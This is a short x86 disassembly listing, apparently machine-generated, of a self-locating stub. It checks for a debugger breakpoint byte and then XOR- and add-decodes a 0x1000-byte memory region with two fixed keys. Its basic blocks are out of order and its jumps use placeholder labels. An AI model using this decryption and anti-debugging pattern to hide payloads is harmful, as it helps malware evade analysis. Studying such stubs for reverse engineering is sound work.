sub_5e300b
pop eax
mov ebx eax
inc eax
sub eax 0xcf000
sub eax 0x10098a1c
add eax 0x10098a11
cmp [ ebx ] 0xcc
jne rwxdata
add eax 0x0
mov [ esp + 0x8 ] eax
pop ebx
pop eax
retn
mov [ ebx ] 0x0
mov ebx 0x1000
push 0x4d28c890
push 0x7440db41
push ebx
push eax
call sub_5e3046
sub_5e3046
push ebp
mov ebp esp
push eax
push ebx
push ecx
push esi
mov esi [ ebp + 0x8 ]
mov ecx [ ebp + 0xc ]
shr ecx 0x2
mov eax [ ebp + 0x10 ]
mov ebx [ ebp + 0x14 ]
pop esi
pop ecx
pop ebx
pop eax
leave
retn 0x10
xor [ esi ] eax
add [ esi ] ebx
add esi 0x4
dec ecx
jmp rwxdata
test ecx ecx
je rwxdata
_start
sub esp 0x4
push eax
push ebx
call sub_5e300b
int3
